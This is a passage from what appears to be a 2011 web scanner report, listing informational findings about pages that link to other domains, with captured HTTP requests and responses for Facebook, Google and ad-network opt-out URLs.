<a href="http://www.facebook.com/TimesofIndia" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203491_26781952138_8365597_q.jpg" alt="The Times of India" /></a>
...[SNIP]...

21.102. http://www.facebook.com/plugins/recommendations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/recommendations.php?site=http%3A%2F%2Fsocial.ndtv.com&width=313&height=315&header=false&colorscheme=light&font=arial&border_color=%23ffffff;&border=0; HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/NDTVProfit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.155.62
X-Cnection: close
Date: Sun, 04 Sep 2011 03:38:44 GMT
Content-Length: 21516

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title></title><style>body{background:#fff;font-size: 11px;font-family:"l
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7fca9dcf70c761e2"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Barkha Dutt - NDTV Social" href="http://social.ndtv.com/barkhadutt" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174507_100000939267567_6623088_q.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://social.ndtv.com/barkhadutt" target="_blank">Barkha Dutt - NDTV Social</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1fea4019ad498c00"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Anoop&#039;s Groups | NDTV Social" href="http://social.ndtv.com/groups.php?id=150150" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273703_100000034701915_6637143_q.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://social.ndtv.com/groups.php?id=150150" target="_blank">Anoop&#039;s Groups | NDTV Social</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5669dd9b3e26d30f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Home Page - NDTV Social" href="http://social.ndtv.com/home.php" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQAYtyp-sNXdxcy3&amp;url=http%3A%2F%2Fstatic.social.ndtv.com%2Fimages%2Fhm_icon_facebook.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://social.ndtv.com/home.php" target="_blank">Home Page - NDTV Social</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_f71d3db3d8fe2c4"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Info - Prannoy Roy - NDTV Social" href="http://social.ndtv.com/prannoyroy/info" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQDB3_-1XnurOlzx&amp;url=http%3A%2F%2Fstatic.social.ndtv.com%2Ffiles%2Fcrop%2F45x45%2Fphoto_pages_207_1271661594.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://social.ndtv.com/prannoyroy/info" target="_blank">Info - Prannoy Roy - NDTV Social</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_63e9747001057b48"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Neeraj&#039;s Groups | NDTV Social" href="http://social.ndtv.com/groups.php?id=158929" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174389_100001899528918_2029042_q.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://social.ndtv.com/groups.php?id=158929" target="_blank">Neeraj&#039;s Groups | NDTV Social</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_9db1f6127acfd0e"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="The Buck Stops Here - Was Pak sheltering Osama? - NDTV Social" href="http://social.ndtv.com/buckstopshere/permalink/45571" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs353.snc4/41676_672663030_5641_q.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://social.ndtv.com/buckstopshere/permalink/45571" target="_blank">The Buck Stops Here - Was Pak sheltering Osama? - NDTV Social</a>
...[SNIP]...

21.103. http://www.google.com/cse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /cse

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cse?cx=partner-pub-8331061652869281%3Ajrt9zf-p1ic&ie=ISO-8859-1&q=xss&sa=%A0%A0Search%A0%A0&siteurl=www.dnaindia.com%2Fworld HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/world
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 02:33:52 GMT
Server: qfe
Cache-Control: private
Content-Length: 5647
X-XSS-Protection: 1; mode=block


<!DOCTYPE html>
<html dir="ltr">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>Google Custom Search</title>
<script type="text/javascript" src="http://www.google
...[SNIP]...
<div id="cse-header">
<a id="cse-logo-target" href="http://www.dnaindia.com/">
<img id="cse-logo" src="http://www.dnaindia.com/images/new/dna_logo_09.gif" height="88" />
</a>
...[SNIP]...

21.104. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:24:43 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 114171

<!doctype html> <head> <title>bangkok thailand news - Google Search</title> <script>window.google={kEI:"a-FiTqPHAY7OiAL5_L2pCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttrib
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=bangkok+thailand+news&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bangkokpost.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CFcQFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:nuMczgjsrgIJ:www.bangkokpost.com/+bangkok+thailand+news&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CFoQIDAA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www.bangkokpost.com/breakingnews" onmousedown="return clk(this,this.href,'','','','1','','0CFwQ0gIoADAA')">Breaking news</a> - <a href="http://www.bangkokpost.com/news/local" onmousedown="return clk(this,this.href,'','','','1','','0CF0Q0gIoATAA')">Local news</a> - <a href="http://www.bangkokpost.com/topstories" onmousedown="return clk(this,this.href,'','','','1','','0CF4Q0gIoAjAA')">Top stories</a> - <a href="http://www.bangkokpost.com/business/" onmousedown="return clk(this,this.href,'','','','1','','0CF8Q0gIoAzAA')">Business</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nationmultimedia.com/" class=l onmousedown="return clk(this,this.href,'','','','2','','0CGQQFjAB')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:BJofv49fCNgJ:www.nationmultimedia.com/+bangkok+thailand+news&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CGYQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bangkokpost.com/breakingnews" class=l onmousedown="return clk(this,this.href,'','','','3','','0CGsQFjAC')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.topix.com/th/bangkok" class=l onmousedown="return clk(this,this.href,'','','','4','','0CHIQFjAD')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:-iWBN7jVho0J:www.topix.com/th/bangkok+bangkok+thailand+news&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','4','','0CHQQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.explore-thailand.net/" class=l onmousedown="return clk(this,this.href,'','','','5','','0CHkQFjAE')">Today <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:fsBIfTWon04J:www.explore-thailand.net/+bangkok+thailand+news&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','5','','0CHwQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.onlinenewspapers.com/thailand.htm" class=l onmousedown="return clk(this,this.href,'','','','6','','0CIEBEBYwBQ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:iiT43P4nxWoJ:www.onlinenewspapers.com/thailand.htm+bangkok+thailand+news&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CIMBECAwBQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.airportsuvarnabhumi.com/" class=l onmousedown="return clk(this,this.href,'','','','7','','0CIgBEBYwBg')">SUVARNABHUMI AIRPORT NEW <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:6Z_iIEAqdw4J:www.airportsuvarnabhumi.com/+bangkok+thailand+news&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CIoBECAwBg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tourismthailand.org/" class=l onmousedown="return clk(this,this.href,'','','','8','','0CI8BEBYwBw')">Tourism Authority of <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Y-3mDQpbLnAJ:www.tourismthailand.org/+bangkok+thailand+news&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CJEBECAwBw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bkkok.com/" class=l onmousedown="return clk(this,this.href,'','','','9','','0CJYBEBYwCA')">BKKOK.COM</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:MHBc6xBiLakJ:www.bkkok.com/+bangkok+thailand+news&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CJgBECAwCA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bbc.co.uk/news/10129711" class=l onmousedown="return clk(this,this.href,'','','','10','','0CJ0BEBYwCQ')">BBC <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:8aW0YwC7GUkJ:www.bbc.co.uk/news/10129711+bangkok+thailand+news&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CKABECAwCQ')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://www.bangkokpost.com/news/local/254917/libya-rebel-leader-tortured-by-cia-in-thailand" class=l onmousedown="return clk(this,this.href,'','','','11','','0CKUBEKkCMAo')">Libya rebel leader &#39;tortured by CIA&#39; in <em>
...[SNIP]...
<span class=tl><a href="http://www.taiwannews.com.tw/etn/news_content.php?id=1697105" class=l onmousedown="return clk(this,this.href,'','','','12','','0CKsBEKkCMAs')">Ousted <em>
...[SNIP]...

21.105. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=3&ved=0CEIQFjAC&url=http%3A%2F%2Fwww.dnaindia.com%2F&ei=kOFiTqvxNOnciAL8u8SZCg&usg=AFQjCNGjTGmmNY2l1cGo08ycamWr1aXGrQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news#sclient=psy&hl=en&source=hp&q=mumbay+news&pbx=1&oq=mumbay+news&aq=f&aqi=g-c5&aql=&gs_sm=e&gs_upl=32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 302 Found
Location: http://www.dnaindia.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 02:25:28 GMT
Server: gws
Content-Length: 221
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.dnaindia.com/">here</A>
...[SNIP]...

21.106. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=1&ved=0CDMQFjAA&url=http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2Farticlelist%2F-2128838597.cms&ei=kOFiTqvxNOnciAL8u8SZCg&usg=AFQjCNEGMh66bo66YuFOmqh2YMhLGpybdQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news#sclient=psy&hl=en&source=hp&q=mumbay+news&pbx=1&oq=mumbay+news&aq=f&aqi=g-c5&aql=&gs_sm=e&gs_upl=32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 302 Found
Location: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 02:25:25 GMT
Server: gws
Content-Length: 271
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms">here</A>
...[SNIP]...

21.107. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=4&ved=0CFMQqQIwAw&url=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&ei=kOFiTqvxNOnciAL8u8SZCg&usg=AFQjCNEYjIhujgk6z2fcRHomcXl90X5A3g HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news#sclient=psy&hl=en&source=hp&q=mumbay+news&pbx=1&oq=mumbay+news&aq=f&aqi=g-c5&aql=&gs_sm=e&gs_upl=32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 302 Found
Location: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 02:25:35 GMT
Server: gws
Content-Length: 288
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142">here</A>
...[SNIP]...

21.108. http://www.mathtag.com/cgi-bin/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mathtag.com
Path:   /cgi-bin/optout

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/optout?action=nai_oo_verify&nocache=628656096755947 HTTP/1.1
Host: www.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ts=1315103290; uuid=; optout=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:29:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Sun, 04 Sep 2011 11:29:04 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-cache, must-revalidate
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 240
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>
...[SNIP]...

21.109. http://www.mathtag.com/cgi-bin/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mathtag.com
Path:   /cgi-bin/optout

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/optout?action=nai_status&nocache=0.9946903 HTTP/1.1
Host: www.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ts=1315103290; uuid=; optout=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:01:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Sun, 04 Sep 2011 11:01:47 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-cache, must-revalidate
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 242
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>
...[SNIP]...

21.110. http://www.networkadvertising.org/yahoo_handler  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /yahoo_handler

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /yahoo_handler?token=QTNjYXUuZUVQOUE- HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 11:03:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a>
...[SNIP]...

21.111. http://www.pulse360.com/behavior/nai-opt-out.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pulse360.com
Path:   /behavior/nai-opt-out.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /behavior/nai-opt-out.html?checkdrop=1 HTTP/1.1
Host: www.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:32:12 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 240
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>
...[SNIP]...

21.112. http://www.pulse360.com/behavior/nai-opt-out.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pulse360.com
Path:   /behavior/nai-opt-out.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /behavior/nai-opt-out.html?status=1&nocache=0.9330376 HTTP/1.1
Host: www.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:04:24 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Length: 242
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>
...[SNIP]...

21.113. http://www.tidaltv.com/optout/status.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tidaltv.com
Path:   /optout/status.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /optout/status.ashx?nocache=0.7982255 HTTP/1.1
Host: www.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
